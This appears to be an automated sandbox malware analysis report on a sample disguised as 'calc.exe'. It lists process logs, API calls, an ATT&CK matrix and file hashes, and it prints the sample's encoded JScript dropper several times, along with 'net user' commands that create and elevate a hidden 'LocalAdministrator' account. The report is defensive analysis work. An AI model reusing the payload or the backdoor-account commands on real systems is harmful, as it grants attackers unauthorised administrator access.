Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse

Source: calc.exe	Binary or memory string: Shell_TrayWnd
Source: calc.exe, 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: \Software\AutoIt v3\AutoItIncludeSendInput0%doffondownupASC 0%d0E051007080900020409ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTShell_TrayWndVirtualFreeExVirtualAllocEx

Source: C:\Users\user\Desktop\calc.exe

Code function: GetLocaleInfoA,

0_2_004558FF

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00454555 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00454555

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0043738E GetUserNameW,

0_2_0043738E

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_004527E8 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,

0_2_004527E8

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_0040EA76 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,FreeLibrary,

0_2_0040EA76

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 00000002.00000003.1239643263.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DisableBehaviorMonitoringOS=Win_7
Source: calc.exe	Binary or memory string: WIN_XP
Source: calc.exe	Binary or memory string: WIN_VISTA

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0042F3BC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_0042F3BC
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0042F9C7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_0042F9C7
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00430B6B OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_00430B6B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Command and Scripting Interpreter	1 Create Account	1 Exploitation for Privilege Escalation	1 Masquerading	21 Input Capture	2 System Time Discovery	Remote Services	21 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 Scripting	1 Access Token Manipulation	1 Access Token Manipulation	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	12 Process Injection	12 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	16 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
calc.exe	100%	Joe Sandbox ML

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523636
Start date and time:	2024-10-01 21:44:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	261
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	calc.exe
Detection:	MAL
Classification:	mal64.winEXE@363/21@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 40 Number of non-executed functions: 291
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): p-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, t-ring.msedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing behavior and disassembly information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: calc.exe

Simulations

Behavior and APIs

Time	Type	Description
15:45:48	API Interceptor	1737986x Sleep call for process: mmc.exe modified

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\5BgbSwcYMy.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\BqmogIcAUc.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\G0MZ6GMwly.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\IDsLsRQlEe.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\Jtk8zxQOt2.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\PZr1luuECN.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\R7pPYI1mUq.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
